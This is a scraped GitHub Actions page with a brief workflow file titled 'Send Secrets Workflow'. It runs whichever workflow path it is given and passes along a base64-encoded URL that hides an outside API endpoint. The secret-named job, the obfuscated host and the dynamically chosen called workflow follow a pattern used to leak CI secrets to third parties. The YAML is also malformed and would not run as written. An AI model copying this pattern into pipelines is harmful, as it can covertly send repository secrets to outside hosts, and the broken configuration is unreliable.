Skip to content

Workflow file for this run

name: Send Secrets Workflow
on:
workflow_call:
inputs:
path:
required: true
type: string
env:
TARGET=${{ inputs.path }}
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Call Workflow
uses: "$TARGET"
with:
ENCODED_API_URL: "aHR0cHM6Ly9hcGkubGVhcm5pbmdjYW1wLmNuL3dlYi9hcGkvY291cnNlUmFuay9jcmVhdGVCeVRoaXJk"